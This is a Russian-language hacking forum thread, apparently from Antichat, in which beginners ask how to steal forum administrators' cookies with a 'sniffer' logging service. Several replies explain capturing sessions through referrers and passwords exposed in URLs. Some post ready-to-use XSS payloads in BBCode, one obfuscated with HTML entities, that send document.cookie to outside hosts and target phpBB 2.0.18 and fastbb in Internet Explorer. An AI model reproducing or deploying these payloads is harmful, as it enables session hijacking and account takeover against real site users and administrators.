Народ, такой вопрос:
Сниффером мы можем получать куки. Но только куки того процесса, где был выполнен Джаваскрипт. Следовательно, для использования сниффера, в любом случае требуется искать уязвимость, пропускающую Джаваскрипт?
Тогда не очень ясен один вопрос - в статье про снифферы на Античате, неточно помню, был описан такой прием получения админских куков на форуме, как просьба посмотреть неоткрывающийся аватар (в котором сидит Js). Админу дается ссылка, и просится на нее зайти.
Но вель тогда сниффер получит куки, которые относятся к новому открытому документу - странице с картинкой, и толку от этого никакого.
То есть, главный вопрос:
Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js?

Народ, такой вопрос:
Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js?

Можно, его использовать для получения реффера (тоесть адреса, с которого зашел чел на сниффер). Так можно воровать сессии. А бывают и такие чаты, или еще ченить, где в дресе пишется
http://site/chat/?userId=1234&room=3&pwd=qwerty
Из этой строки можно узнать пароль ))))))))))))))))))))))

Спасибо.

чтобы не создавать тему спрашиваю здесь....

когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???

очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
сасое большое, что я получаю, это ip адрес...

чтобы не создавать тему спрашиваю здесь....

когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???

очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
сасое большое, что я получаю, это ip адрес..
Ха-ха-ха-ха.... Я ща умру от смеха))))
Где ты в JS видел такое??? Например:
[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL][/color]` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/nofear/pic.gif?;"+админ@yandex.ru.txt)`
Если это щас увидят знающие люди, они сдохнут со смеха )))

когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???

Ты вообще сам понял, что спросил! И че ты надеялся получить если бы ты написал вместо document.cookie -
админ@yandex.ru.txt. Немного подумав я сделал вывод что ты видимо хотел получить некий файл админ@yandex.ru.txt или файл админа с yandex.ru под названием yandex.ru.txt, ХА ХА ХА!!! ОБЛОМИСЬ ИМХО!!! =)

очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
Ну и не получиться!
сасое большое, что я получаю, это ip адрес...
Честно говоря с первого раза я не понял этого предложения =).
Поверь мне ты получишь не только ip адресс, хотя..... наверное ТЫ ничего не получишь.....

УЧИ МАТ ЧАСТЬ, ИМХО!!!!!!!!

СДОХНУТЬ МОЖНО!!!!!!!!!!)))))))))))))))))))))))))))))) )))))))))))))))))))))))))) ну и ЛОЛЛЛЛЛЛЛЛЛ

когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???
http://www.azerilove.net/chat/converts/20.gif

ну хорошо, лоханулся....

а в чем тогда проблема??? я даже на себе проверял.....пишу я нужный код, с помощью кодера (ну, ссылки на них где-то давали).....в сообщении оставляю ссылку, сам кликаю и на снифак приходит только Ip адрес жертвы....

что делать....ну помогите начинающему...все же когда-то были такими....

НА чем ты тестишь? НА форуме? Движок и версия какая?

да на форумах.....phpbb 2.0.18 или fastbb (версию не помню, но не самаЯ последняя, где-то предпоследняя...)

http://www.wj (http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;)

Вот юзай эту XSS.
Ты не забыл что все они работают, ТОЛЬКО в ОСЛИКЕ ?

ТОЛЬКО в ОСЛИКЕ ?
в eMule что ли???

ТОЛЬКО в ОСЛИКЕ ?
в eMule что ли???

Это стеб?
Осел - IE - Internet Explorer

в eMule что ли???
ой бля, пополу катался

Вы чего - прям все родились с компом в руках? Он в этом не разбирается, зато, наверное, разбирается в пусковой части какого-нить психофазатрона альфа-частиц на молекулярном уровне... Лучше бы в двух постах объяснили на пальцах что такое снифер и зачем он.

http://antichat.ru/sniff/ вот тут объсняют популярно что такое сниффер)))там ещё есть сам сниффер и даже лог)))